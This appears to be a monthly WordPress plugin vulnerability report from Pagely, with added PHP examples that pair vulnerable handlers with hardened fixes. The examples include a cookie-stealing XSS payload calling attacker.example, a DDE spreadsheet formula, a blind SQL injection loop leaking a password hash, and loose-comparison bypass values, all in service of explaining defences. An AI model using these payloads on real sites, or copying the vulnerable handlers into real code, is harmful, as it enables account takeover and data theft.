This monthly report is provided for the WordPress community at large from Pagely’s head of security, Robert Rowley. Rowley and the entire security team keep their finger on the pulse of any potential vulnerabilities that might affect our customers, as well as any WordPress user.
We sincerely hope these efforts help everyone who can use expert information on the month's security issues. We commend the researchers and developers who identify and patch these issues in a timely fashion.
No notable WordPress core security releases.
Plugin/Theme Vulnerabilities of Note
Security & Malware scan by CleanTalk
This vulnerability in the Security & Malware scan by CleanTalk plugin allows any authenticated user, including low-privilege roles such as subscriber or editor, to call Ajax handlers that do not enforce authorization. Those calls can delete or download files on the server and could potentially invoke other plugin functions.
Adning Advertising
The Adning Advertising plugin in versions lower than 1.5.6 allows unauthenticated requests to upload or delete arbitrary files. An attacker who can upload a PHP file to a web-accessible path gets remote code execution (RCE), which in turn leads to full site takeover.
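Both the CleanTalk and the Adning issues above come down to request handlers that act before checking who is asking. The following is an added example, not code from either plugin or from Pagely: a hypothetical WordPress Ajax handler that deletes a file, first without authorization (registered for logged-in users and, via the `nopriv` hook, for anonymous visitors) and then with a nonce check, a capability check and path confinement. The action names, the `manage_options` capability and the `example-plugin` upload subdirectory are assumptions; the code runs inside WordPress, not stand-alone.

```php
<?php
// Added example, not code from CleanTalk, Adning or Pagely: a hypothetical
// WordPress plugin Ajax handler that deletes a file, shown without and then
// with authorization. The action names, capability and upload subdirectory
// are assumptions for illustration. Runs inside WordPress, not stand-alone.

// VULNERABLE. Registered for logged-in users (wp_ajax_) and for anonymous
// visitors (wp_ajax_nopriv_), with no nonce, no capability check and a path
// taken straight from the request. A subscriber, or with the nopriv hook
// anyone at all, can delete any file the web server user can write to.
add_action( 'wp_ajax_example_delete_file_unsafe',        'example_delete_file_unsafe' );
add_action( 'wp_ajax_nopriv_example_delete_file_unsafe', 'example_delete_file_unsafe' );
function example_delete_file_unsafe() {
    $file = $_POST['file'];          // e.g. ../wp-config.php
    unlink( ABSPATH . $file );
    wp_send_json_success();
}

// HARDENED. Only the logged-in hook is registered, the request must carry a
// nonce issued for this action, the caller must hold a capability the action
// genuinely requires, and the target must resolve inside one directory.
add_action( 'wp_ajax_example_delete_file', 'example_delete_file' );
function example_delete_file() {
    // 1. CSRF: dies with 403 when the nonce is missing or invalid.
    check_ajax_referer( 'example_delete_file', 'nonce' );

    // 2. Authorization. Being logged in is not the same as being allowed:
    //    a subscriber passes the nonce check but must fail this one.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation. Drop directory components, then compare the
    //    resolved path against the resolved base so ../ and symlinks cannot
    //    escape the plugin's own upload directory.
    $dir  = realpath( trailingslashit( wp_upload_dir()['basedir'] ) . 'example-plugin' );
    $name = sanitize_file_name( wp_unslash( $_POST['file'] ?? '' ) );
    $path = ( false !== $dir && '' !== $name ) ? realpath( $dir . DIRECTORY_SEPARATOR . $name ) : false;

    if ( false === $path || 0 !== strpos( $path, $dir . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid file', 400 );
    }
    if ( ! unlink( $path ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success();
}

// The nonce is minted when the admin page is rendered and sent back as the
// "nonce" POST field by the JavaScript that calls admin-ajax.php.
function example_delete_file_nonce(): string {
    return wp_create_nonce( 'example_delete_file' );
}
```

An upload handler is the mirror image of the delete handler: the same three checks apply, plus an allow-list of permitted extensions and MIME types and a destination directory from which the web server will not execute PHP. Registering a `wp_ajax_nopriv_` hook is only appropriate for actions that are genuinely meant for anonymous visitors, and even those need input validation.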
Wise Chat
Wise Chat versions lower than 2.8.4 are vulnerable to CSV injection. An unauthenticated user can send a chat message containing a spreadsheet formula, and the message is written unescaped into the exported CSV file. When an administrator opens that export in a spreadsheet application, the formula can be evaluated, which could potentially lead to code execution on the administrator's own machine rather than on the web server.
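CSV injection is fixed on the export side, not in the chat input. The following is an added example, not Wise Chat's code, that writes constructed chat messages to CSV with and without neutralising cells that a spreadsheet would treat as formulas; the message text and column names are assumptions. It runs stand-alone with PHP's bundled `fputcsv`.

```php
<?php
// Added example (not Wise Chat's code): how a chat message becomes a
// spreadsheet formula in a CSV export, and one way to neutralise it. The
// messages below are constructed for illustration.

// Spreadsheet applications evaluate a cell whose first character is one of
// these. Tab and carriage return are included because some applications
// treat them as formula triggers as well.
function csv_escape_cell( string $value ): string {
    if ( $value !== '' && strpos( "=+-@\t\r", $value[0] ) !== false ) {
        // A leading single quote forces the cell to be read as text.
        $value = "'" . $value;
    }
    return $value;
}

// Export messages as CSV. fputcsv() handles quoting of commas, double quotes
// and newlines, but it does nothing about formula prefixes, so the escaping
// above has to be applied to every untrusted cell explicitly.
function export_messages_csv( array $messages, bool $escape ): string {
    $fh = fopen( 'php://memory', 'w+' );
    fputcsv( $fh, [ 'user', 'message' ] );
    foreach ( $messages as $m ) {
        $row = [ $m['user'], $m['message'] ];
        if ( $escape ) {
            $row = array_map( 'csv_escape_cell', $row );
        }
        fputcsv( $fh, $row );
    }
    rewind( $fh );
    $csv = stream_get_contents( $fh );
    fclose( $fh );
    return $csv;
}

// Constructed sample. The second message is the classic DDE-style payload
// that older spreadsheet versions would execute when the file is opened.
$messages = [
    [ 'user' => 'alice', 'message' => 'hello' ],
    [ 'user' => 'anon',  'message' => "=cmd|' /C calc'!A0" ],
];

echo "--- unescaped export ---\n", export_messages_csv( $messages, false );
echo "--- escaped export ---\n",   export_messages_csv( $messages, true );
```

In the escaped export the payload cell begins with a single quote, so the application shows the text instead of evaluating it. Escape every cell that originates from user input, including the username column, and keep the escaping in the exporter rather than relying on input filtering, since the data may have been stored before the filter existed.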
Email Verification for WooCommerce
The Email Verification for WooCommerce plugin prior to version 1.8.2 is affected by a loose comparison issue (PHP `==`) in its verification check. Because a loose comparison can succeed on values that are not actually equal, any user, authenticated or not, could potentially be logged in to the WordPress site.
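To make the loose comparison problem concrete, here is an added example that is not the plugin's code: a verification-code check written with `==` beside one written with a type check and `hash_equals`, run over constructed token pairs. The function names and sample values are assumptions; the comparison semantics shown are those of PHP itself.

```php
<?php
// Added example (not the Email Verification for WooCommerce code): why a PHP
// loose comparison (==) is unsafe for checking secrets, and the strict,
// constant-time replacement. All token values are constructed.

// VULNERABLE. == converts operands before comparing. Two numeric-looking
// strings are compared as numbers, so "0e123" == "0e456" is true (both are
// zero), and a stored value of true, null or "" matches almost any input.
function verify_code_loose( $stored, $supplied ): bool {
    return $stored == $supplied;
}

// HARDENED. Refuse anything that is not a non-empty string on either side
// (arrays and nulls from the request never reach the comparison), then
// compare strictly in constant time.
function verify_code_strict( $stored, $supplied ): bool {
    if ( ! is_string( $stored ) || ! is_string( $supplied ) || $stored === '' ) {
        return false;
    }
    return hash_equals( $stored, $supplied );
}

$cases = [
    // [ stored value, attacker-supplied value ]
    [ '0e830400451993494058024219903391', '0e1234' ], // numeric strings: 0 == 0
    [ '1000', '1e3' ],                                // 1000 == 1000.0
    [ true, 'anything' ],                             // bool true == non-empty string
    [ null, '' ],                                     // null == ''
    [ 'a3f9c2', 'a3f9c2' ],                           // genuinely equal
];

foreach ( $cases as [ $stored, $supplied ] ) {
    printf(
        "%-36s vs %-10s loose=%-5s strict=%s\n",
        var_export( $stored, true ),
        var_export( $supplied, true ),
        var_export( verify_code_loose( $stored, $supplied ), true ),
        var_export( verify_code_strict( $stored, $supplied ), true )
    );
}
```

Only the last case passes the strict check. PHP 8 tightened number-to-string comparisons (`0 == "abc"` is now false), but comparisons between two numeric strings, and against `true` or `null`, behave as shown in every PHP version, so the fix is the strict check and not a PHP upgrade.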
SRS Simple Hits Counter
At the time of writing, the SRS Simple Hits Counter plugin is vulnerable to an unauthenticated blind SQL injection. The reporting party, Tenable ( https://www.tenable.com/security/research/tra-2020-42 ), is working with the developer on a more comprehensive patch and will not release further details of the attack until a patch is available. Site owners using SRS Simple Hits Counter should check daily for the patch and apply it as soon as it is released; until then, deactivating the plugin removes the exposed code path.
Payment Form For Paypal Pro
The Payment Form for PayPal Pro plugin versions before 1.1.65 are vulnerable to unauthenticated SQL injection. The attack is a trivial single request that can expose the contents of the database (including user password hashes and potentially other secrets) to the attacker. This is a high-risk vulnerability and site owners should patch immediately.
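The two SQL injection entries above (SRS Simple Hits Counter and Payment Form for PayPal Pro) share one root cause: a request parameter spliced into query text. The following added example, which is not the code of either plugin, shows a hits-counter lookup built by concatenation beside one that binds its parameter, and uses the concatenated version to leak a password hash one character at a time with blind boolean requests. It runs offline against a constructed in-memory SQLite schema; the table and column names imitate WordPress but are assumptions, and the `$wpdb->prepare()` equivalent is given in a comment.

```php
<?php
// Added example (not the code of either plugin): a hits-counter lookup that
// builds SQL by concatenation versus one that binds parameters, run against
// a constructed in-memory SQLite schema so it executes offline. Table and
// column names imitate WordPress but are assumptions for illustration.

$db = new PDO( 'sqlite::memory:' );
$db->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION );
$db->exec( 'CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)' );
$db->exec( 'CREATE TABLE wp_hits  (post_id INTEGER PRIMARY KEY, hits INTEGER)' );
$db->exec( "INSERT INTO wp_users VALUES (1, 'admin', '\$P\$BsecretHashValue')" ); // constructed hash
$db->exec( 'INSERT INTO wp_hits  VALUES (7, 42)' );

// VULNERABLE. The request parameter is pasted into the query text, so it can
// carry SQL, not just a value.
function hits_vulnerable( PDO $db, string $post_id ): ?int {
    $row = $db->query( "SELECT hits FROM wp_hits WHERE post_id = $post_id" )->fetch( PDO::FETCH_ASSOC );
    return $row ? (int) $row['hits'] : null;
}

// HARDENED. The parameter is cast and bound, so whatever the request contains
// can only ever be compared as a value. The WordPress equivalent is
//   $wpdb->get_var( $wpdb->prepare(
//       "SELECT hits FROM {$wpdb->prefix}hits WHERE post_id = %d", $post_id ) );
function hits_hardened( PDO $db, string $post_id ): ?int {
    $stmt = $db->prepare( 'SELECT hits FROM wp_hits WHERE post_id = ?' );
    $stmt->execute( [ (int) $post_id ] );
    $row = $stmt->fetch( PDO::FETCH_ASSOC );
    return $row ? (int) $row['hits'] : null;
}

// Normal use: both return the hit count for post 7.
var_dump( hits_vulnerable( $db, '7' ), hits_hardened( $db, '7' ) );

// Blind boolean injection. The page still shows only a hit count or nothing,
// but whether a row comes back now depends on a condition the attacker chose,
// so one request per candidate character leaks the admin password hash.
$leaked   = '';
$alphabet = str_split( 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$./' );
for ( $pos = 1; $pos <= 6; $pos++ ) {
    foreach ( $alphabet as $ch ) {
        $payload = "7 AND (SELECT substr(user_pass, $pos, 1) FROM wp_users WHERE ID = 1) = '$ch'";
        if ( hits_vulnerable( $db, $payload ) !== null ) {
            $leaked .= $ch;
            break;
        }
    }
}
var_dump( $leaked ); // first six characters of the stored hash

// Against the bound query the injected condition has no effect: a true and a
// false condition produce the same answer, so no information leaks.
var_dump( hits_hardened( $db, '7 AND 1=1' ), hits_hardened( $db, '7 AND 1=0' ) );
```

The "trivial single request" in the PayPal Pro advisory and the blind injection reported against SRS Simple Hits Counter differ only in how much comes back per request; the defence is identical. In WordPress code that means every value in a query goes through `$wpdb->prepare()` with a `%d`, `%s` or `%f` placeholder, and identifiers (table or column names) are never taken from the request at all.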
WooCommerce Subscriptions
The WooCommerce Subscriptions plugin is vulnerable to unauthenticated stored cross-site scripting (XSS) in the subscription billing step. An attacker can submit an XSS payload in the billing details during signup; the payload is stored with the account and later executes in the browser of the administrator or user who reviews the attacker's account. Site owners should update WooCommerce Subscriptions to version 2.6.3 and avoid reviewing new account information in the admin until that update is performed.
JobSearch
The JobSearch plugin versions before 1.5.6 are vulnerable to reflected cross-site scripting. As with the KingComposer vulnerability, the risk is high if logged-in users are targeted, since a crafted link opened by an administrator runs the attacker's script in that administrator's session. A proof of concept for this vulnerability is due to be released on August 6th, 2020; site owners should patch before that date.
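The stored XSS in WooCommerce Subscriptions and the reflected XSS in JobSearch both come down to user-controlled text reaching HTML without escaping. The following added example, which is not code from either plugin, renders a stored billing name and a reflected search term first unescaped and then escaped for the context they land in. The input strings, function names and markup are constructed; `htmlspecialchars` stands in for the `esc_html()` and `esc_attr()` helpers WordPress code would use. It runs stand-alone.

```php
<?php
// Added example (not code from WooCommerce Subscriptions or JobSearch): a
// stored value (billing first name) and a reflected value (search term)
// rendered into HTML, unescaped and then escaped. Inputs are constructed;
// in WordPress, esc_html() and esc_attr() play the role of esc() below.

// Escape for element text or a *quoted* attribute value. ENT_QUOTES covers
// both " and ', ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string (which would silently drop the output and hide bugs).
function esc( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8' );
}

// Stored XSS: typed as the billing first name at signup, saved verbatim, and
// later rendered on the admin page that reviews the subscription.
$billing_first_name = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Reflected XSS: sent to a victim in a link whose query parameter is echoed
// straight back into the results page.
$search_term = '"><script>alert(document.domain)</script>';

function render_admin_review_vulnerable( string $name ): string {
    return "<td>$name</td>";                       // payload becomes markup
}
function render_admin_review_hardened( string $name ): string {
    return '<td>' . esc( $name ) . '</td>';        // payload becomes text
}
function render_search_vulnerable( string $q ): string {
    return "<input type=\"text\" name=\"q\" value=\"$q\">";   // "> closes the attribute
}
function render_search_hardened( string $q ): string {
    return '<input type="text" name="q" value="' . esc( $q ) . '">';
}

echo render_admin_review_vulnerable( $billing_first_name ), "\n";
echo render_admin_review_hardened( $billing_first_name ), "\n";
echo render_search_vulnerable( $search_term ), "\n";
echo render_search_hardened( $search_term ), "\n";
```

Escaping belongs at the point of output and must match the destination context: the entity encoding above is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL or an unquoted attribute needs a different encoder (WordPress provides `esc_js()` and `esc_url()` for two of those). Storing the value escaped instead of raw is not a substitute, because the same value is usually rendered in more than one context.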